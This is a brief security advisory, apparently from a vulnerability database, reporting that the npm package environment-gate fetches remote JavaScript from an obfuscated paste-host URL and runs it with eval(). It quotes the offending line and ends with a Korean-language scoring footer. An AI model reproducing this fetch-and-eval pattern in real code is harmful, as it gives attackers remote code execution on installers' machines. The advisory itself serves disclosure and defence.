Malicious code in environment-gate (npm)
-= Per source details. Do not edit below this line.=-
The package's only export, gate(), performs an HTTP GET to a base64-obfuscated URL (https://www.jsonkeeper.com/b/VKUNI) and passes the response body directly to eval(). The destination is an anonymous, mutable JSON paste host whose contents the author can change at any moment, so any caller of the documented gate() API executes arbitrary remote JavaScript in the installer's Node.js process — full remote code execution. The base64 wrapping of the URL and the cover-story description ('utility to await multiple asynchronous calls') with no repo, empty author field, and a single-file payload are consistent with a throwaway malicious package. index.js line 2: require('axios').get(atob('...')).then(r => {eval(r.data.content)}).
왜 이 VPI인가 (설명가능 · 실험적)
VPI 산정 기준
| 영향도(기본값(정보 없음)) | 55.00 |
| 악용 신호(추가 악용신호 없음) | ×1.00 |
| VPI | 55.00 |
VPI 공식 vpi-v1 기준